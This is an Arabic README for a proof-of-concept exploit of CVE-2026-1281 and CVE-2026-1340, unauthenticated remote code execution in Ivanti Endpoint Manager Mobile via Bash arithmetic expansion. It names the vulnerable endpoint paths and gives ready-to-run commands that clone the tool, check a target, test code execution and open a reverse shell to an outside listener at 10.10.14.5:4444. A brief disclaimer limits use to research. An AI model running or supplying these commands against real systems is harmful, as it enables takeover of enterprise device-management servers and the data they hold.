
إثبات المفهوم لـ CVE-2026-1281 و CVE-2026-1340 - تنفيذ التعليمات البرمجية عن بُعد (RCE) قبل المصادقة في Ivanti EPMM عبر توسيع الحساب الحسابي في Bash
⚠️ إخلاء مسؤولية: هذا الـ PoC مقدم لأغراض تعليمية وبحثية في مجال الأمن السيبراني فقط. الاستخدام دون إذن صريح غير قانوني.
إثبات مفهوم (PoC) شامل لاستغلال الثغرات الأمنية CVE-2026-1281 و CVE-2026-1340 التي تؤثر على Ivanti Endpoint Manager Mobile (EPMM). تسمح هذه الثغرات بتنفيذ كود عشوائي عن بُعد (RCE) دون مصادقة عبر آلية Bash Arithmetic Expansion.
/mifs/c/appstore/fob//mifs/c/aftstore/fob/git clone https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE.git
cd CVE-2026-1281-Ivanti-EPMM-RCE
pip3 install -r requirements.txt
chmod +x *.py
# اختبار الثغرة
python3 exploit.py -t https://target.com -c
# التحقق من RCE
python3 exploit.py -t https://target.com --test-rce
# Reverse shell
python3 exploit.py -t https://target.com --reverse-shell 10.10.14.5:4444
Mehdi Le Deaut - مستشار أمن سيبراني | متخصص في الفريق الأحمر
هذا المشروع مرخص بموجب MIT - راجع ملف LICENSE لمزيد من التفاصيل.